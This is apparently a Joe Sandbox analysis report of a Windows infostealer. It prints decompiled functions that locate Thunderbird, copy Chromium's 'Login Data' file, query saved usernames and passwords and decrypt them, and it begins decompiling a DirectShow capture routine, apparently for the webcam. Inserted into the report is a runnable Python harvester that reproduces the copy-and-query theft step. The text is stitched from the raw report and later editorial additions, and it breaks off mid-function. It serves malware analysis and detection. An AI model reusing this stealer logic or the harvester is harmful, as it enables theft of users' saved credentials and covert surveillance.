                                                                    • Instruction ID: 178586bd109a26611bcd5ea442039cd91611748fdc1099cf8b36d2d4cff5b7a6
                                                                    • Opcode Fuzzy Hash: e30f0d67b10b0f3ea7bcf7bd073f69aa4adbcdde7dc5bfe1220792854650b540
                                                                    • Instruction Fuzzy Hash: 651184B2A40218BBE72097B5ED49FAF776CEB14749F104420FB05E6281DB70DE08CA75
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D1C118(WCHAR* __ecx, char* __edx, void* __eflags) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				short _v536;
                                                                    				char* _t32;
                                                                    				WCHAR* _t33;
                                                                    
                                                                    				_v12 = 0x104;
                                                                    				_v16 = 1;
                                                                    				_t32 = __edx;
                                                                    				_t33 = __ecx;
                                                                    				E02D11052( &_v536, 0, 0x104);
                                                                    				lstrcpyW( &_v536, L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\");
                                                                    				lstrcatW( &_v536, _t33);
                                                                    				if(RegOpenKeyExW(0x80000002,  &_v536, 0, 1,  &_v8) != 0) {
                                                                    					return 0;
                                                                    				}
                                                                    				RegQueryValueExW(_v8, L"Path", 0,  &_v16, _t32,  &_v12);
                                                                    				RegCloseKey(_v8);
                                                                    				return 1;
                                                                    			}

                                                                    APIs
                                                                    • lstrcpyW.KERNEL32 ref: 02D1C154
                                                                    • lstrcatW.KERNEL32(?,thunderbird.exe), ref: 02D1C162
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,02D1A729,?,00000104,00000000), ref: 02D1C17B
                                                                    • RegQueryValueExW.ADVAPI32(02D1A729,Path,00000000,?,?,?,?,00000104,00000000), ref: 02D1C198
                                                                    • RegCloseKey.ADVAPI32(02D1A729,?,00000104,00000000), ref: 02D1C1A1
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 02D1C14E
                                                                    • thunderbird.exe, xrefs: 02D1C15A
                                                                    • Path, xrefs: 02D1C190
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                                                    • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                                                    • API String ID: 3135247354-1374996286
                                                                    • Opcode ID: 9fdacd3be9335e99ab375e1e4e0820ec5630eba3abdb3fda53d2cb159c67adde
                                                                    • Instruction ID: f6a97edc31f2d9122fdedbf44060516b84ae4352420fc727a153506076afd94e
                                                                    • Opcode Fuzzy Hash: 9fdacd3be9335e99ab375e1e4e0820ec5630eba3abdb3fda53d2cb159c67adde
                                                                    • Instruction Fuzzy Hash: 051112B2D8011CBFE710AAA4ED49FDA777CEB64305F100465BA05E2240E6709E588B61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlEnterCriticalSection.NTDLL(0054BF90), ref: 0040478B
                                                                    • GetModuleFileNameA.KERNEL32(?,00000104), ref: 00404816
                                                                    • __alloca_probe_16.LIBCMT ref: 0040488D
                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,?,?), ref: 004048C7
                                                                    • LoadTypeLib.OLEAUT32(?,00000000), ref: 004048DE
                                                                    • RtlEnterCriticalSection.NTDLL(0054BFAC), ref: 00404ADF
                                                                    • RtlLeaveCriticalSection.NTDLL(0054BFAC), ref: 00404AF5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Enter$ByteCharFileLeaveLoadModuleMultiNameTypeWide__alloca_probe_16
                                                                    • String ID:
                                                                    • API String ID: 554975853-0
                                                                    • Opcode ID: c2c0ac5533a874e479ebd785b81e21b65538b429b7ccc11221118e51253b8220
                                                                    • Instruction ID: d58f747a6a25426e7dd0b31ff1eeea421ba2af15bbe7e5e59a307e65b5ba61fe
                                                                    • Opcode Fuzzy Hash: c2c0ac5533a874e479ebd785b81e21b65538b429b7ccc11221118e51253b8220
                                                                    • Instruction Fuzzy Hash: 64D198B59002189FDB24DF64CC44BEAB7B5AF85314F1480EAEA09A7390D734EE85CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E02D1C4A8(intOrPtr __ecx, void* __eflags, char _a4, signed int _a8, char _a12, char _a16, intOrPtr _a20) {
                                                                    				WCHAR* _v12;
                                                                    				char _v16;
                                                                    				WCHAR* _v20;
                                                                    				signed int _v24;
                                                                    				signed int _v28;
                                                                    				signed int _v32;
                                                                    				char _v36;
                                                                    				char _v40;
                                                                    				char _v44;
                                                                    				char _v48;
                                                                    				intOrPtr _v52;
                                                                    				char _v56;
                                                                    				char _v60;
                                                                    				char _v64;
                                                                    				char _v68;
                                                                    				char _v72;
                                                                    				intOrPtr _v76;
                                                                    				char _v80;
                                                                    				char _v84;
                                                                    				char _v88;
                                                                    				int _t148;
                                                                    				intOrPtr* _t160;
                                                                    				void* _t161;
                                                                    				char _t165;
                                                                    				char _t177;
                                                                    				char _t178;
                                                                    				char _t188;
                                                                    				char* _t189;
                                                                    				char* _t190;
                                                                    				char* _t191;
                                                                    				void* _t192;
                                                                    				void* _t194;
                                                                    				char _t198;
                                                                    				char _t223;
                                                                    				intOrPtr _t233;
                                                                    				char* _t251;
                                                                    				char* _t255;
                                                                    				void* _t322;
                                                                    				void* _t323;
                                                                    				void* _t324;
                                                                    				void* _t325;
                                                                    				void* _t326;
                                                                    				void* _t327;
                                                                    				char _t331;
                                                                    				WCHAR* _t337;
                                                                    				intOrPtr _t338;
                                                                    				void* _t339;
                                                                    				void* _t340;
                                                                    
                                                                    				_t343 = __eflags;
                                                                    				_v24 = _v24 & 0x00000000;
                                                                    				_v28 = _v28 & 0x00000000;
                                                                    				_t233 = __ecx;
                                                                    				_t322 = 0x1a;
                                                                    				_v52 = __ecx;
                                                                    				E02D1F76B( &_v12, _t322, __eflags);
                                                                    				_t329 = "\\";
                                                                    				E02D1346A( &_v12, _t322, __eflags, "\\");
                                                                    				_t323 = 8;
                                                                    				E02D13335( &_v12, _t343, E02D134A7( &_v48, _t323, _t343));
                                                                    				E02D15EA5(_v48);
                                                                    				_t336 = L".tmp";
                                                                    				E02D1346A( &_v12, _t323, _t343, L".tmp");
                                                                    				_t324 = 0x1a;
                                                                    				E02D1F76B( &_v20, _t324, _t343);
                                                                    				E02D1346A( &_v20, _t324, _t343, _t329);
                                                                    				_t325 = 8;
                                                                    				E02D13335( &_v20, _t343, E02D134A7( &_v48, _t325, _t343));
                                                                    				E02D15EA5(_v48);
                                                                    				E02D1346A( &_v20, _t325, _t343, _t336);
                                                                    				_t344 = _a12;
                                                                    				_t251 =  &_v48;
                                                                    				if(_a12 == 0) {
                                                                    					_push(0x1c);
                                                                    				} else {
                                                                    					_push(0x1a);
                                                                    				}
                                                                    				_pop(_t326);
                                                                    				E02D13437( &_v24, E02D1F76B(_t251, _t326, _t344));
                                                                    				E02D15EA5(_v48);
                                                                    				E02D1346A( &_v24, _t326, _t344, _a4);
                                                                    				_t345 = _a12;
                                                                    				_t255 =  &_a12;
                                                                    				if(_a12 == 0) {
                                                                    					_push(0x1c);
                                                                    				} else {
                                                                    					_push(0x1a);
                                                                    				}
                                                                    				_pop(_t327);
                                                                    				E02D13437( &_v28, E02D1F76B(_t255, _t327, _t345));
                                                                    				E02D15EA5(_a12);
                                                                    				E02D1346A( &_v28, _t327, _t345, _a8);
                                                                    				_t148 = PathFileExistsW(_v24);
                                                                    				_t337 = _v28;
                                                                    				if(_t148 == 0 || PathFileExistsW(_t337) == 0 || CopyFileW(_v24, _v12, 0) == 0 || CopyFileW(_t337, _v20, 0) == 0) {
                                                                    					L12:
                                                                    					_t331 = 0;
                                                                    					goto L13;
                                                                    				} else {
                                                                    					E02D13437( &_v24,  &_v12);
                                                                    					_t160 = E02D13554( &_v24,  &_a12);
                                                                    					_t161 =  *((intOrPtr*)(_t233 + 0x30))( *_t160,  &_v56);
                                                                    					_t268 = _a12;
                                                                    					E02D15EA5(_a12);
                                                                    					if(_t161 == 0) {
                                                                    						_v32 = _v32 & 0x00000000;
                                                                    						_a8 = _a8 & 0x00000000;
                                                                    						_t165 = E02D1CED9(_t268, _t268,  &_v32,  &_a8);
                                                                    						_t340 = _t339 + 0x10;
                                                                    						_t331 = 1;
                                                                    						__eflags = _t165;
                                                                    						if(_t165 == 0) {
                                                                    							L36:
                                                                    							 *((intOrPtr*)(_t233 + 0x60))();
                                                                    							 *((intOrPtr*)(_t233 + 0x34))();
                                                                    							E02D1362D(_t340,  &_v12);
                                                                    							E02D1FF0B(_v56);
                                                                    							E02D1362D(_t340,  &_v20);
                                                                    							E02D1FF0B(_v16);
                                                                    							L13:
                                                                    							E02D15EA5(_v20);
                                                                    							E02D15EA5(_v12);
                                                                    							E02D15EA5(_t337);
                                                                    							E02D15EA5(_v24);
                                                                    							return _t331;
                                                                    						}
                                                                    						__eflags = _a16;
                                                                    						_t176 =  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins";
                                                                    						_t177 =  *((intOrPtr*)(_t233 + 0x38))(_v56,  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins", 0xffffffff,  &_v16, 0);
                                                                    						_t340 = _t340 + 0x14;
                                                                    						__eflags = _t177;
                                                                    						if(_t177 != 0) {
                                                                    							goto L36;
                                                                    						}
                                                                    						_t178 =  *((intOrPtr*)(_t233 + 0x44))(_v16);
                                                                    						_pop(_t268);
                                                                    						__eflags = _t178 - 0x64;
                                                                    						if(_t178 != 0x64) {
                                                                    							L35:
                                                                    							__eflags = _t178;
                                                                    							if(_t178 != 0) {
                                                                    								goto L11;
                                                                    							}
                                                                    							goto L36;
                                                                    						}
                                                                    						_t338 = _t233;
                                                                    						do {
                                                                    							_a16 = E02D15E22(_t331);
                                                                    							_t335 = E02D15E22(_t331);
                                                                    							_a4 = _t186;
                                                                    							_v48 = E02D15E22(1);
                                                                    							_t188 = E02D15E22(1);
                                                                    							_a12 = _t188;
                                                                    							_t189 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 0);
                                                                    							__eflags =  *_t189;
                                                                    							if( *_t189 != 0) {
                                                                    								E02D13125( &_a4, E02D133BF( &_v60, _t189));
                                                                    								E02D15EA5(_v60);
                                                                    								_t335 = _a4;
                                                                    							}
                                                                    							_t190 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 1);
                                                                    							__eflags =  *_t190;
                                                                    							if( *_t190 != 0) {
                                                                    								E02D13125( &_v48, E02D133BF( &_v64, _t190));
                                                                    								E02D15EA5(_v64);
                                                                    							}
                                                                    							_t191 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 2);
                                                                    							__eflags =  *_t191;
                                                                    							if( *_t191 != 0) {
                                                                    								E02D13125( &_a12, E02D133BF( &_v68, _t191));
                                                                    								E02D15EA5(_v68);
                                                                    							}
                                                                    							_t192 =  *((intOrPtr*)(_t338 + 0x5c))(_v16, 3, _v32, _a8);
                                                                    							_t194 = E02D1CF58( *((intOrPtr*)(_t338 + 0x54))(), _t192, _v16, 3);
                                                                    							_t340 = _t340 - 0xc + 0x24;
                                                                    							E02D13125( &_a16, E02D133BF( &_v72, _t194));
                                                                    							E02D15EA5(_v72);
                                                                    							_t198 = E02D1308C( &_a12);
                                                                    							__eflags = _t198;
                                                                    							if(_t198 > 0) {
                                                                    								L26:
                                                                    								_v88 = 0;
                                                                    								_v84 = 0;
                                                                    								_v80 = 0;
                                                                    								__eflags = E02D1308C( &_a4);
                                                                    								if(__eflags > 0) {
                                                                    									E02D13437( &_v88, E02D1309D( &_a4, __eflags,  &_v36));
                                                                    									E02D15EA5(_v36);
                                                                    									_v36 = 0;
                                                                    								}
                                                                    								__eflags = E02D1308C( &_a12);
                                                                    								if(__eflags > 0) {
                                                                    									E02D13437( &_v84, E02D1309D( &_a12, __eflags,  &_v40));
                                                                    									E02D15EA5(_v40);
                                                                    									_v40 = 0;
                                                                    								}
                                                                    								__eflags = E02D1308C( &_a16);
                                                                    								if(__eflags != 0) {
                                                                    									E02D13437( &_v80, E02D1309D( &_a16, __eflags,  &_v44));
                                                                    									E02D15EA5(_v44);
                                                                    									_v44 = 0;
                                                                    								}
                                                                    								_t340 = _t340 - 0x10;
                                                                    								_v76 = _a20;
                                                                    								E02D11F95(_t340,  &_v88);
                                                                    								E02D11FCB(_t338);
                                                                    								E02D113EF( &_v88);
                                                                    							} else {
                                                                    								_t223 = E02D1308C( &_a16);
                                                                    								__eflags = _t223;
                                                                    								if(_t223 <= 0) {
                                                                    									goto L33;
                                                                    								}
                                                                    								goto L26;
                                                                    							}
                                                                    							L33:
                                                                    							E02D15EA5(_a12);
                                                                    							E02D15EA5(_v48);
                                                                    							E02D15EA5(_t335);
                                                                    							E02D15EA5(_a16);
                                                                    							_t178 =  *((intOrPtr*)(_t338 + 0x44))(_v16);
                                                                    							_pop(_t268);
                                                                    							_t331 = 1;
                                                                    							__eflags = _t178 - 0x64;
                                                                    						} while (_t178 == 0x64);
                                                                    						_t337 = _v28;
                                                                    						_t233 = _v52;
                                                                    						goto L35;
                                                                    					}
                                                                    					L11:
                                                                    					E02D1362D(_t340,  &_v12);
                                                                    					E02D1FF0B(_t268);
                                                                    					E02D1362D(_t340,  &_v20);
                                                                    					E02D1FF0B();
                                                                    					goto L12;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 02D1F76B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,00000000,?), ref: 02D1F79C
                                                                      • Part of subcall function 02D13335: lstrcatW.KERNEL32(00000000,745D0770), ref: 02D13365
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    • PathFileExistsW.SHLWAPI(00000000,?,00000000,00000000,00000000,.tmp,00000000,02D24684,.tmp,00000000,02D24684,?,00000000), ref: 02D1C5A5
                                                                    • PathFileExistsW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02D1C245), ref: 02D1C5AF
                                                                    • CopyFileW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D1C5C3
                                                                    • CopyFileW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D1C5CF
                                                                      • Part of subcall function 02D1CED9: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,02D1C66B,?,?,00000000,?), ref: 02D1CF43
                                                                      • Part of subcall function 02D1CED9: LocalFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,02D1C66B,?,?,00000000,?), ref: 02D1CF4C
                                                                      • Part of subcall function 02D1CF58: LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 02D1CFE0
                                                                      • Part of subcall function 02D1CF58: BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 02D1D00E
                                                                      • Part of subcall function 02D1CF58: LocalFree.KERNEL32(?), ref: 02D1D096
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,745D0770,?,02D15A4F,.bss,00000000), ref: 02D133C8
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,?,02D15A4F,.bss,00000000), ref: 02D133D5
                                                                      • Part of subcall function 02D133BF: lstrcpyA.KERNEL32(00000000,?,?,02D15A4F,.bss,00000000), ref: 02D133E8
                                                                      • Part of subcall function 02D13125: lstrcatA.KERNEL32(00000000,745D0770,?,00000000,?,02D135C4,00000000,00000000,?,02D14E98,?,?,?,?,?,00000000), ref: 02D13151
                                                                      • Part of subcall function 02D1308C: lstrlenA.KERNEL32(00000000,02D130B4,745D0770,00000000,00000000,?,02D132DC,02D1350E,00000000,-00000001,745D0770,?,02D1350E,00000000,?,00000000), ref: 02D13093
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileFreeLocal$Pathlstrlen$CopyExistslstrcat$AllocCryptDecryptFolderSpecialVirtuallstrcpy
                                                                    • String ID: .tmp$select signon_realm, origin_url, username_value, password_value from logins$select signon_realm, origin_url, username_value, password_value from wow_logins
                                                                    • API String ID: 881303001-3832748974
                                                                    • Opcode ID: 4409f010c47582863ec2c2bde45f9d159ddb63d45be6c67783075c699693e157
                                                                    • Instruction ID: 0dbed1cda6a8fcc83146f5a56f02a4f94e9b794cc492f782baaf86fbc767c700
                                                                    • Opcode Fuzzy Hash: 4409f010c47582863ec2c2bde45f9d159ddb63d45be6c67783075c699693e157
                                                                    • Instruction Fuzzy Hash: 7CD13D71D10209BBDF15EFA4EC91AEEB77AEF54300F54406AE412A6690DF359E04CF61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
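The API and string list above describes the Chromium credential theft step: the 'Login Data' SQLite file is checked with PathFileExistsW, copied with CopyFileW to a '.tmp' path (the browser keeps the original open and locked), the two SELECT statements are run against the copy, and each password_value is handed to BCryptDecrypt. The following Python is an added example, not code from the report or from the sample, that reproduces that access pattern on a database constructed here. The 'v10' blob layout it splits (3-byte marker, 12-byte nonce, ciphertext, 16-byte AES-GCM tag) is general Chromium-on-Windows knowledge rather than something the report states, the decryption key is not recovered because that needs the DPAPI-protected key from the browser's Local State file, and trying both table names in turn is an assumption about why the sample carries both queries.

```python
"""Added example: the copy-then-query pattern of a Chromium 'Login Data' stealer,
run against a database constructed inline. Not code from the report or the sample."""
import os
import shutil
import sqlite3
import tempfile

# The two statements listed under "String ID" above, verbatim. Which table name
# exists depends on the browser build (assumption), so harvest() tries both.
QUERIES = [
    "select signon_realm, origin_url, username_value, password_value from logins",
    "select signon_realm, origin_url, username_value, password_value from wow_logins",
]

NONCE_LEN, TAG_LEN = 12, 16   # AES-GCM nonce and tag sizes of the 'v10' blob format


def build_sample_login_data(path, table="logins"):
    """Constructed stand-in for a Chromium 'Login Data' file, reduced to the four
    queried columns. The blob bytes are made up and are not real ciphertext."""
    blob = b"v10" + bytes(range(NONCE_LEN)) + b"\xaa" * 9 + b"\xbb" * TAG_LEN
    con = sqlite3.connect(path)
    con.execute(f"create table {table} (signon_realm text, origin_url text, "
                "username_value text, password_value blob)")
    con.execute(f"insert into {table} values (?, ?, ?, ?)",
                ("https://example.test/", "https://example.test/login", "alice", blob))
    con.commit()
    con.close()


def split_v10_blob(blob):
    """Split a 'v10' password blob into the nonce, ciphertext and GCM tag that an
    AES-GCM decrypt call consumes. Returns None for blobs in another format
    (older builds stored a raw DPAPI blob without the 'v10' marker)."""
    if not blob.startswith(b"v10") or len(blob) < 3 + NONCE_LEN + TAG_LEN:
        return None
    body = blob[3:]
    return {"nonce": body[:NONCE_LEN],
            "ciphertext": body[NONCE_LEN:-TAG_LEN],
            "tag": body[-TAG_LEN:]}


def harvest(login_data_path):
    """Copy first, query second: the CopyFileW / '.tmp' pattern in the API list.
    The browser holds the original open with a lock, so the stealer reads a copy."""
    fd, tmp_copy = tempfile.mkstemp(suffix=".tmp")
    os.close(fd)
    shutil.copyfile(login_data_path, tmp_copy)
    rows = []
    con = sqlite3.connect(tmp_copy)
    try:
        for query in QUERIES:
            try:
                cursor = con.execute(query)
            except sqlite3.OperationalError:   # this table name does not exist here
                continue
            for realm, url, user, password in cursor:
                rows.append({"realm": realm, "url": url, "user": user,
                             "blob": split_v10_blob(password)})
    finally:
        con.close()
        os.remove(tmp_copy)   # the temporary copy is the artefact a responder looks for
    return rows


def demo():
    """Build one database per table name, harvest each, clean up; returns the rows."""
    workdir = tempfile.mkdtemp()
    try:
        results = {}
        for table in ("logins", "wow_logins"):
            path = os.path.join(workdir, f"Login Data ({table})")
            build_sample_login_data(path, table)
            results[table] = harvest(path)
        return results
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    for table, rows in demo().items():
        for row in rows:
            print(table, row["user"], row["url"], row["blob"]["nonce"].hex())
```

For detection the useful part is the sequence rather than any single call: a process that is not the browser creating a '.tmp' file immediately after touching a 'Login Data' path, followed by bcrypt.dll use, is the pattern the API list above documents.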

                                                                    APIs
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 004098E4
                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 004099F2
                                                                    • _UnwindNestedFrames.LIBCMT ref: 00409B44
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00409B5F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 2751267872-393685449
                                                                    • Opcode ID: cc91ace58337b72701b50270f3e2967c555d85595d705a01769e77637ad3365b
                                                                    • Instruction ID: d3875208064eb098c4efa27100056e69cfd514645d62d1e8bcbaf91445c364f9
                                                                    • Opcode Fuzzy Hash: cc91ace58337b72701b50270f3e2967c555d85595d705a01769e77637ad3365b
                                                                    • Instruction Fuzzy Hash: 71B15571900209AFCF18EFA5D8819AFBBB5BF44314B14416AE8117B392C739EE51CF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 61%
                                                                    // Joe Sandbox decompilation. The comments were added in editing and are not part of the
                                                                    // report; they name the virtual calls by vtable slot. Slots 0/4/8 are
                                                                    // IUnknown::QueryInterface/AddRef/Release on every COM interface. On the object in _v20
                                                                    // the slots 0xC and 0x2C match IFilterGraph::AddFilter and IGraphBuilder::Connect, on the
                                                                    // object in _v24 the slots 0x10 and 0x14 match ISampleGrabber::SetMediaType and
                                                                    // GetConnectedMediaType, 0x48 is sizeof(AM_MEDIA_TYPE) on 32-bit, and the 0x28 bytes copied
                                                                    // from pbFormat+0x30 are the BITMAPINFOHEADER inside a VIDEOINFOHEADER. Together with the
                                                                    // filter names L"Source" and L"Grabber" this is the DirectShow capture-graph pattern; that
                                                                    // reading is an inference from the offsets, the report itself only lists the
                                                                    // CoCreateInstance calls and the strings.
                                                                    			E02D2273A(intOrPtr __ecx, intOrPtr _a4) {
                                                                    				signed int _v12;      // filter returned by E02D22A6B, added to the graph as L"Source"
                                                                    				signed int _v16;      // second interface on the _v24 object, added as L"Grabber"
                                                                    				signed int _v20;      // graph object (slots 0xC and 0x2C used)
                                                                    				signed int _v24;      // first object created (slots 0x10 and 0x14 used)
                                                                    				intOrPtr _v28;        // saved __ecx (caller's this)
                                                                    				intOrPtr _v58;
                                                                    				intOrPtr _v64;        // _v68.._v28: 0x28-byte copy of the connected format's BITMAPINFOHEADER
                                                                    				intOrPtr _v68;
                                                                    				void* _v128;
                                                                    				char _v144;           // 0x48-byte media type passed to slot 0x10
                                                                    				intOrPtr _v148;       // pbFormat field of _v216 (AM_MEDIA_TYPE offset 0x44)
                                                                    				char _v216;           // 0x48-byte media type filled by slot 0x14 (216 - 144 = 72 = 0x48)
                                                                    				intOrPtr* _t63;
                                                                    				intOrPtr* _t76;
                                                                    				intOrPtr* _t80;
                                                                    				signed int _t82;
                                                                    				intOrPtr* _t89;
                                                                    				intOrPtr* _t91;
                                                                    				intOrPtr* _t92;
                                                                    				intOrPtr* _t93;
                                                                    				intOrPtr* _t94;
                                                                    				intOrPtr* _t95;
                                                                    				intOrPtr* _t96;
                                                                    				intOrPtr* _t98;
                                                                    				signed int _t103;
                                                                    				intOrPtr _t105;       // (declaration added: used below but left undeclared by the decompiler)
                                                                    				intOrPtr _t113;       // (declaration added, same reason)
                                                                    				intOrPtr* _t115;
                                                                    				intOrPtr* _t118;
                                                                    				void* _t121;          // never assigned: apparently the frame pointer
                                                                    
                                                                    				_v28 = __ecx;
                                                                    				__imp__CoInitialize(0);
                                                                    				_v12 = 0;
                                                                    				_v16 = 0;
                                                                    				_t118 = 0;
                                                                    				_v20 = 0;
                                                                    				_t89 = 0;
                                                                    				_v24 = 0;
                                                                    				_t115 = __imp__CoCreateInstance;
                                                                    				// CoCreateInstance(CLSID at 0x2d245a0, NULL, CLSCTX_INPROC_SERVER, IID at 0x2d27410, &_v24)
                                                                    				_t63 =  *_t115(0x2d245a0, 0, 1, 0x2d27410,  &_v24);
                                                                    				_t91 = _v24;
                                                                    				if(_t91 == 0) {
                                                                    					L8:
                                                                    					// Shared exit path: slot 8 is IUnknown::Release on each object that was obtained.
                                                                    					_t92 = _v12;
                                                                    					if(_t92 != 0) {
                                                                    						_t63 =  *((intOrPtr*)( *_t92 + 8))(_t92);
                                                                    						_v12 = _v12 & 0x00000000;
                                                                    					}
                                                                    					L10:
                                                                    					_t93 = _v16;
                                                                    					if(_t93 != 0) {
                                                                    						_t63 =  *((intOrPtr*)( *_t93 + 8))(_t93);
                                                                    						_v16 = _v16 & 0x00000000;
                                                                    					}
                                                                    					_t94 = _v20;
                                                                    					if(_t94 != 0) {
                                                                    						_t63 =  *((intOrPtr*)( *_t94 + 8))(_t94);
                                                                    						_v20 = _v20 & 0x00000000;
                                                                    					}
                                                                    					_t95 = _v24;
                                                                    					if(_t95 != 0) {
                                                                    						_t63 =  *((intOrPtr*)( *_t95 + 8))(_t95);
                                                                    						_v24 = _v24 & 0x00000000;
                                                                    					}
                                                                    					if(_t118 != 0) {
                                                                    						_t63 =  *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                    					}
                                                                    					if(_t89 != 0) {
                                                                    						_t63 =  *((intOrPtr*)( *_t89 + 8))(_t89);
                                                                    					}
                                                                    					__imp__CoUninitialize();
                                                                    					return _t63;
                                                                    				}
                                                                    				// Slot 0: QueryInterface(IID at 0x2d24580, &_v16) on the object just created.
                                                                    				_t63 =  *((intOrPtr*)( *_t91))(_t91, 0x2d24580,  &_v16);
                                                                    				_t96 = _v16;
                                                                    				if(_t96 == 0) {
                                                                    					goto L8;
                                                                    				}
                                                                    				 *((intOrPtr*)( *_t96 + 4))(_t96);      // slot 4: AddRef
                                                                    				// The subcall does its own CoCreateInstance (see the API list below) and returns the
                                                                    				// filter in _v12; _a4 is passed through, presumably selecting the device.
                                                                    				_t63 = E02D22A6B(_a4,  &_v12);
                                                                    				if(_v12 == 0) {
                                                                    					goto L10;
                                                                    				}
                                                                    				// Third object: CoCreateInstance(CLSID at 0x2d245f0, NULL, CLSCTX_INPROC_SERVER, IID at 0x2d27400, &_v20)
